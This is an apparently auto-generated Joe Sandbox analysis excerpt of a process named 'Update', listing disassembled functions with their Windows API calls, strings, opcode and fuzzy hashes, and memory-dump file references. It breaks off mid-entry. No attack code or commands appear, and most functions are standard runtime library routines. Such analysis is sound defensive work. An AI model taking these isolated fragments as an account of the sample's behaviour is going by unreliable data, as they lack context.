API String ID: 2015114452-0
Opcode ID: acedf90b80d6d002c941a4656d6538b1a410208fef9862587fe7595bb7566cf6
Instruction ID: b7daced23c9356a27a0183da3579496c690680551d467ea175292ad6a364ece0
Opcode Fuzzy Hash: acedf90b80d6d002c941a4656d6538b1a410208fef9862587fe7595bb7566cf6
Instruction Fuzzy Hash: 8701F936A5430DBAE710E6A49C81FFEF7ACBB04B10F104941FB04EA1C5DAA5E801D7B8

Function 10002BD0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 10002BFF
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 10002C15
TranslateMessage.USER32(?), ref: 10002C24
DispatchMessageW.USER32(?), ref: 10002C2A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 10002C38

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
String ID:
API String ID: 2015114452-0
Opcode ID: dbe9700d19ae9a12251f89c422866142aee7b4545ced7af6ef9db51ab6727882
Instruction ID: 0e3c485fe407bbf507bfa30b8d40781191f7ce2fd7dbe990fe93c7e11cc8c17a
Opcode Fuzzy Hash: dbe9700d19ae9a12251f89c422866142aee7b4545ced7af6ef9db51ab6727882
Instruction Fuzzy Hash: 8901A972A80319F6F610EB948D91FAE736CEB04B91F504511FF04EE0D9DAB1E80587B4

Function 037F4B70 Relevance: 7.5, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000), ref: 037F4B83
EnterCriticalSection.KERNEL32(?,?,00000000), ref: 037F4B8D
LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 037F4BA0
LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 037F4BA3

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: b5f28771c0962748a49700bacbca08f8e87ea000c40329de9c7151849163a87d
Instruction ID: 6e46fe61debd083a7c9d4e775c4fa894ab032e87f20b24993ed399ecb7cd8b2e
Opcode Fuzzy Hash: b5f28771c0962748a49700bacbca08f8e87ea000c40329de9c7151849163a87d
Instruction Fuzzy Hash: D2012C766006149FD720EB7AFCC4B5BF7ECEB88364F0549A9E64683604C775E8458A60

Function 10004B50 Relevance: 7.5, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000), ref: 10004B63
EnterCriticalSection.KERNEL32(?,?,00000000), ref: 10004B6D
LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 10004B80
LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 10004B83

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 3c4cb16bca3ae15824b6f58c01f312d0d5f5bcc1af3ff3d380ee54a514ce913b
Instruction ID: aa03fd3e3b24d4ff679a20f9d9d19219b814eae2566e95c25fa4737bddb7a95c
Opcode Fuzzy Hash: 3c4cb16bca3ae15824b6f58c01f312d0d5f5bcc1af3ff3d380ee54a514ce913b
Instruction Fuzzy Hash: 4A0184765006109FE310DB75ECC8B9BB3E8EB8C355F064819E10687100C735FC458AA4

Function 6CA9B2CF Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CA9B2D6
std::_Lockit::_Lockit.LIBCPMT ref: 6CA9B2E1
std::_Lockit::~_Lockit.LIBCPMT ref: 6CA9B34F

Part of subcall function 6CA9B1D8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CA9B1F0

std::locale::_Setgloballocale.LIBCPMT ref: 6CA9B2FC
_Yarn.LIBCPMT ref: 6CA9B312

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 5dc2ae7a93eba2cc10063159a22d5311b27571120ca25d448a96795521d9b8dd
Instruction ID: af2975ea7e510dca715cbbb1494f1e9e90135e491ffb5490ba94d624b8e70ed6
Opcode Fuzzy Hash: 5dc2ae7a93eba2cc10063159a22d5311b27571120ca25d448a96795521d9b8dd
Instruction Fuzzy Hash: B701D435A106229BCB09EB20D90A6BD77F2BF81648B148109D81167B80CF345F8BCBC5

Function 037F2D30 Relevance: 7.5, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 037F2D5C
CancelIo.KERNEL32(?), ref: 037F2D66
InterlockedExchange.KERNEL32(00000000,00000000), ref: 037F2D6F
closesocket.WS2_32(?), ref: 037F2D79
SetEvent.KERNEL32(00000001), ref: 037F2D83

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: b29f964b3b49fd48859670672b96918e514558d0acfa23f08b347a0c2e5d48a7
Instruction ID: a5d58a2df97a59539546cd31d1b6a793dce0ea39be951cdce6f61431f9a6f70d
Opcode Fuzzy Hash: b29f964b3b49fd48859670672b96918e514558d0acfa23f08b347a0c2e5d48a7
Instruction Fuzzy Hash: B1F03C76100B04ABD324EF54ED49F66B7BCFB89B11F100A5DF69696684C6B4B5088BA0

Function 00C72CE7 Relevance: 7.5, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00C72D13
CancelIo.KERNEL32(?), ref: 00C72D1D
InterlockedExchange.KERNEL32(00000000,00000000), ref: 00C72D26
closesocket.WS2_32(?), ref: 00C72D30
SetEvent.KERNEL32(00000001), ref: 00C72D3A

Memory Dump Source

Source File: 00000003.00000002.3509855269.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c70000_Update.jbxd

Similarity

API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
String ID:
API String ID: 1486965892-0
Opcode ID: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
Instruction ID: d46d94f7805c44196b4ebb837d5e3d653f746ec5cb3ec5178d202dd975663aed
Opcode Fuzzy Hash: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
Instruction Fuzzy Hash: 33F04F76100710EFE330DB94CC89F5677B8FB49B12F148658FA969B690C6B1F904CBA0

Function 03805006 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 03805012

Part of subcall function 03803E5B: __getptd_noexit.LIBCMT ref: 03803E5E
Part of subcall function 03803E5B: __amsg_exit.LIBCMT ref: 03803E6B

__getptd.LIBCMT ref: 03805029
__amsg_exit.LIBCMT ref: 03805037
__lock.LIBCMT ref: 03805047
__updatetlocinfoEx_nolock.LIBCMT ref: 0380505B

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 0d139a52ee1cbefd047c21936e96a6f29297b9b6df52a37f650ad1601f980284
Instruction ID: 89c444f1f38ce97f34f3c44958bccdde81a884c2de644cc4331d1e08afcd20eb
Opcode Fuzzy Hash: 0d139a52ee1cbefd047c21936e96a6f29297b9b6df52a37f650ad1601f980284
Instruction Fuzzy Hash: 7FF06D7A948700DBDBE5FBED9D02B4D63A4AF41B20F1502C9D615EF2C0CB6454418EA7

Function 1000E13F Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 1000E14B

Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F

__getptd.LIBCMT ref: 1000E162
__amsg_exit.LIBCMT ref: 1000E170
__lock.LIBCMT ref: 1000E180
__updatetlocinfoEx_nolock.LIBCMT ref: 1000E194

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 0522d91088f6fb7310532faddd65fc2dc9ce4b376bceba7dbe74de096dd3a9dc
Instruction ID: 612b0c8b07e52b5ee846fa9c2d173a4fa9df34f322aac77c2402261cad3e7578
Opcode Fuzzy Hash: 0522d91088f6fb7310532faddd65fc2dc9ce4b376bceba7dbe74de096dd3a9dc
Instruction Fuzzy Hash: 59F090369446249BF721EBB8980278D32F0EF40BE0F118149F494771DACB74AD40CA56

Function 037FC910 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 037FC932
GetCommandLineW.KERNEL32 ref: 037FC938
GetStartupInfoW.KERNEL32(?), ref: 037FC947
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 037FC96F
ExitProcess.KERNEL32 ref: 037FC977

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
String ID:
API String ID: 3421218197-0
Opcode ID: ab233291c0b6141373087516d23201f9706910f55623396eb8c5ab96e3eb80fc
Instruction ID: 0802506782188209cd5da3650f844cc55ce50344b8ff07aba7fd2b6fce081c4c
Opcode Fuzzy Hash: ab233291c0b6141373087516d23201f9706910f55623396eb8c5ab96e3eb80fc
Instruction Fuzzy Hash: 67F03071684318BBEB60EBA4DC4DFEA777CFB04B10F1006D4B619A60D4DA706A44CB54

Function 037F75B0 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 037F75D2
GetCommandLineW.KERNEL32 ref: 037F75D8
GetStartupInfoW.KERNEL32(?), ref: 037F75E7
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 037F760F
ExitProcess.KERNEL32 ref: 037F7617

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
String ID:
API String ID: 3421218197-0
Opcode ID: 9eb107f24f710ea7405d6996194bf3d22f49cb46278842b464fc026bf540dcf5
Instruction ID: 79f57f856387389fb8753bffff1c986b4f86857a8c6c9c442ae6eef347eb3f60
Opcode Fuzzy Hash: 9eb107f24f710ea7405d6996194bf3d22f49cb46278842b464fc026bf540dcf5
Instruction Fuzzy Hash: 1EF03A71684319BBEB20EBA4DC4DF9977BCFB04B10F2006E4B619AA0C4EA706A44CB54

Function 037FF9B8 Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON

Download Yara Rule

APIs

Part of subcall function 03801CD0: _doexit.LIBCMT ref: 03801CDC

___set_flsgetvalue.LIBCMT ref: 037FF9CA

Part of subcall function 03803CA0: TlsGetValue.KERNEL32(00000000,03803DF9,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D,03816340,00000008,03803FFF), ref: 03803CA9
Part of subcall function 03803CA0: DecodePointer.KERNEL32(?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D,03816340,00000008,03803FFF,00000000), ref: 03803CBB
Part of subcall function 03803CA0: TlsSetValue.KERNEL32(00000000,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D,03816340,00000008,03803FFF,00000000), ref: 03803CCA

___fls_getvalue@4.LIBCMT ref: 037FF9D5

Part of subcall function 03803C80: TlsGetValue.KERNEL32(?,?,037FF9DA,00000000), ref: 03803C8E

___fls_setvalue@8.LIBCMT ref: 037FF9E8

Part of subcall function 03803CD4: DecodePointer.KERNEL32(?,?,?,037FF9ED,00000000,?,00000000), ref: 03803CE5

GetLastError.KERNEL32(00000000,?,00000000), ref: 037FF9F1
ExitThread.KERNEL32 ref: 037FF9F8
GetCurrentThreadId.KERNEL32 ref: 037FF9FE
__freefls@4.LIBCMT ref: 037FFA1E

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 781180411-0
Opcode ID: 3d3b777091ecf3bb6c501918c2fe942e19cb63cd7c2a7d6efa76b581e2eabef9
Instruction ID: dbbc7789449935ea4178da80af0560e975852f27c7563ba9b997a16497e4359d
Opcode Fuzzy Hash: 3d3b777091ecf3bb6c501918c2fe942e19cb63cd7c2a7d6efa76b581e2eabef9
Instruction Fuzzy Hash: 8DE04F3DA017197BCB50F7F98D0C84EBA1CAD01181F1404C0FA14DB180DE64D51187A7

Function 100071AA Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON

Download Yara Rule

APIs

Part of subcall function 100082F0: _doexit.LIBCMT ref: 100082FC

___set_flsgetvalue.LIBCMT ref: 100071BC

Part of subcall function 10009754: TlsGetValue.KERNEL32(00000000,100098AD,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000), ref: 1000975D
Part of subcall function 10009754: DecodePointer.KERNEL32(?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA,0000000D), ref: 1000976F
Part of subcall function 10009754: TlsSetValue.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 1000977E

___fls_getvalue@4.LIBCMT ref: 100071C7

Part of subcall function 10009734: TlsGetValue.KERNEL32(?,?,100071CC,00000000), ref: 10009742

___fls_setvalue@8.LIBCMT ref: 100071DA

Part of subcall function 10009788: DecodePointer.KERNEL32(?,?,?,100071DF,00000000,?,00000000), ref: 10009799

GetLastError.KERNEL32(00000000,?,00000000), ref: 100071E3
ExitThread.KERNEL32 ref: 100071EA
GetCurrentThreadId.KERNEL32 ref: 100071F0
__freefls@4.LIBCMT ref: 10007210

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 781180411-0
Opcode ID: 0a01c43476d108d4c9d86bcd5ae0e752dcea8e710ecd95c49a8faa49c4d187ed
Instruction ID: 877ff296740ff87ffef8dcd6d6c63871bb1eb85cd0bb9270c275db20a0a7633c
Opcode Fuzzy Hash: 0a01c43476d108d4c9d86bcd5ae0e752dcea8e710ecd95c49a8faa49c4d187ed
Instruction Fuzzy Hash: 22E04F3A81865967FB01ABF18D4E8CF366CEF052D5B158420FA189701BDB38E90146A1

Function 6CA811B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 291COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 6CA811E3

Strings

ios_base::eofbit set, xrefs: 6CA814E4
ios_base::badbit set, xrefs: 6CA814F4, 6CA8151A
ios_base::failbit set, xrefs: 6CA814E9

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: _strlen
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 4218353326-1866435925
Opcode ID: bc7f26f953e7df54816cec106f98d236a8cadad622cf8dae8f808db9e4aa7cee
Instruction ID: 0f557609cee97d8546b7112d7086f8b8d4aeccb55627bf0189e9c79d2a6c16e8
Opcode Fuzzy Hash: bc7f26f953e7df54816cec106f98d236a8cadad622cf8dae8f808db9e4aa7cee
Instruction Fuzzy Hash: 5CC16E75A016158FDB04CF68C580BADBBF1FF48328F688258E925AB795C335ED85CB90

Function 6CA8BD70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 6CA9B2CF: __EH_prolog3.LIBCMT ref: 6CA9B2D6
Part of subcall function 6CA9B2CF: std::_Lockit::_Lockit.LIBCPMT ref: 6CA9B2E1
Part of subcall function 6CA9B2CF: std::locale::_Setgloballocale.LIBCPMT ref: 6CA9B2FC
Part of subcall function 6CA9B2CF: _Yarn.LIBCPMT ref: 6CA9B312
Part of subcall function 6CA9B2CF: std::_Lockit::~_Lockit.LIBCPMT ref: 6CA9B34F

Part of subcall function 6CA84CA0: std::_Lockit::_Lockit.LIBCPMT ref: 6CA84CD5
Part of subcall function 6CA84CA0: std::_Lockit::_Lockit.LIBCPMT ref: 6CA84CEF
Part of subcall function 6CA84CA0: std::_Lockit::~_Lockit.LIBCPMT ref: 6CA84D10
Part of subcall function 6CA84CA0: __Getctype.LIBCPMT ref: 6CA84DC4
Part of subcall function 6CA84CA0: std::_Lockit::~_Lockit.LIBCPMT ref: 6CA84DF7

std::ios_base::_Addstd.LIBCPMT ref: 6CA8BE72

Strings

ios_base::eofbit set, xrefs: 6CA8BE95
ios_base::badbit set, xrefs: 6CA8BEA4, 6CA8BEC7
ios_base::failbit set, xrefs: 6CA8BE9A

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$AddstdGetctypeH_prolog3SetgloballocaleYarnstd::ios_base::_std::locale::_
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3375204848-1866435925
Opcode ID: 2b1994204222862acfece24b8e370d9784deb0117d5d5711d3cedc315e2dd207
Instruction ID: 6aaf642dd410526f8b428478202b1d2710b5d7eb258419ee6822f66958958742
Opcode Fuzzy Hash: 2b1994204222862acfece24b8e370d9784deb0117d5d5711d3cedc315e2dd207
Instruction Fuzzy Hash: 4851BFB0E023098FDB04CF64D8457AEBBB1FF49314F148268E5165BB90E775A985CB91

Function 037F9430 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 037F944A

Part of subcall function 037FEF86: std::exception::exception.LIBCMT ref: 037FEF9B
Part of subcall function 037FEF86: __CxxThrowException@8.LIBCMT ref: 037FEFB0
Part of subcall function 037FEF86: std::exception::exception.LIBCMT ref: 037FEFC1

std::_Xinvalid_argument.LIBCPMT ref: 037F9482

Part of subcall function 037FEF39: std::exception::exception.LIBCMT ref: 037FEF4E
Part of subcall function 037FEF39: __CxxThrowException@8.LIBCMT ref: 037FEF63
Part of subcall function 037FEF39: std::exception::exception.LIBCMT ref: 037FEF74

Strings

invalid string position, xrefs: 037F9445
string too long, xrefs: 037F947D

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: 875e8b9ea7885624902e746c3434f8b40af6376ee8c8d181f80b265e38c3f30c
Instruction ID: d231470a8ba274a445a35b61c1d31be5c22d6bb404ef338c6e896822cb6100d1
Opcode Fuzzy Hash: 875e8b9ea7885624902e746c3434f8b40af6376ee8c8d181f80b265e38c3f30c
Instruction Fuzzy Hash: AE21A7337006109FC720DE9CE880B6AF799FBA2664B14096FE392CB791D761D844C7A1

Function 037F84B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 037F84C9

Part of subcall function 037FEF86: std::exception::exception.LIBCMT ref: 037FEF9B
Part of subcall function 037FEF86: __CxxThrowException@8.LIBCMT ref: 037FEFB0
Part of subcall function 037FEF86: std::exception::exception.LIBCMT ref: 037FEFC1

std::_Xinvalid_argument.LIBCPMT ref: 037F84E7

Strings

invalid string position, xrefs: 037F84C4
string too long, xrefs: 037F84E2

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: invalid string position$string too long
API String ID: 963545896-4289949731
Opcode ID: b28a5db343af6c574a433e9011a2143c72f52073714001add9bdfd22aeeea4c6
Instruction ID: 2b02b171229d19c8589cb9260f6de7840b4dd5d05db48362f2de4bdf0749bac9
Opcode Fuzzy Hash: b28a5db343af6c574a433e9011a2143c72f52073714001add9bdfd22aeeea4c6
Instruction Fuzzy Hash: 4A217276700706EF8B14DF6CE880C69B3A9BF88314714466AF616CF751E730E954C792

Function 006E1770 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__current_exception.VCRUNTIME140 ref: 006E17AF
__current_exception_context.VCRUNTIME140 ref: 006E17B9
terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 006E17C0

Strings

csm, xrefs: 006E177A

Memory Dump Source

Source File: 00000003.00000002.3509326012.00000000006E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.3509290719.00000000006E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509400316.00000000006E3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509430070.00000000006E4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509430070.0000000000726000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_Update.jbxd

Similarity

API ID: __current_exception__current_exception_contextterminate
String ID: csm
API String ID: 2542180945-1018135373
Opcode ID: 41fdafd931ad9aaddf137b82d0d58c14b10d2b972e8e795f6593ee17b9bb6dd7
Instruction ID: d91b205ca003a08fb08fc6f18e9aab1cfe602643c53c4fcc98283af38c7b5c7a
Opcode Fuzzy Hash: 41fdafd931ad9aaddf137b82d0d58c14b10d2b972e8e795f6593ee17b9bb6dd7
Instruction Fuzzy Hash: 8FF0A7354023804F8F345E2B94855DDB76FAE63B613540559D484CFB10DB30ED91E6D5

Function 6CAB3E91 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6CAB3F2D,?,?,00000000,?,?,?,6CAB3DEB,00000002,FlsGetValue,6CAC17C4,6CAC17CC), ref: 6CAB3E9E
GetLastError.KERNEL32(?,6CAB3F2D,?,?,00000000,?,?,?,6CAB3DEB,00000002,FlsGetValue,6CAC17C4,6CAC17CC,?,?,6CAA93D1), ref: 6CAB3EA8
